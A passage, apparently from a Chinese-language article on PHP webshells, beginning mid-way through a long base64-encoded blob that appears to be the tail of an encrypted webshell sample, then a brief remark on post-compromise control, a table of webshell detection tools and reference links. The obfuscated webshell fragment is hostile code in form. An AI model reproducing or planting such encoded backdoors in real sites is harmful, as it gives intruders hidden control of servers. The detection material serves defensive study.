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‘\x29\x29\x29\x3B","."); ?>
9、加密
这里不再介绍了
五、种马之后
由于被入侵过,对之前的文件有过研究,截几张图大家看看
基本上就可以为所欲为了
六、检测工具
编号 | 名称 | 参考链接 |
---|---|---|
1 | 网站安全狗网马查杀 | http://download.safedog.cn/download/software/safedogwzApache.exe |
2 | D盾 Web查杀 | http://www.d99net.net/down/WebShellKill_V2.0.9.zip |
3 | 深信服WebShellKillerTool | http://edr.sangfor.com.cn/tool/WebShellKillerTool.zip |
4 | BugScaner killwebshell | http://tools.bugscaner.com/killwebshell/ |
5 | 河马专业版查杀Webshell | http://n.shellpub.com/ |
6 | OpenRASPWEBDIR+检测引擎 | https://scanner.baidu.com |
7 | 深度学习模型检测PHP Webshell | http://webshell.cdxy.me/ |
上面工具非常好用,95%的基本都能检测出来,知道webshell是什么样的,就可以根据相应的特征找出来
参考文档
https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
https://joychou.org/web/webshell.html
http://www.likesec.com/2017/12/08/webshell/
http://www.freebuf.com/articles/web/155891.html
http://www.freebuf.com/articles/web/9396.html
https://blog.csdn.net/xysoul/article/details/49791993
https://cloud.tencent.com/developer/article/1097506
http://www.91ri.org/12824.html
http://www.3years.cc/index.php/archives/18/
http://www.cnblogs.com/LittleHann/p/3522990.html
https://habrahabr.ru/post/215139/
https://stackoverflow.com/questions/14674834/php-convert-string-to-hex-and-hex-to-string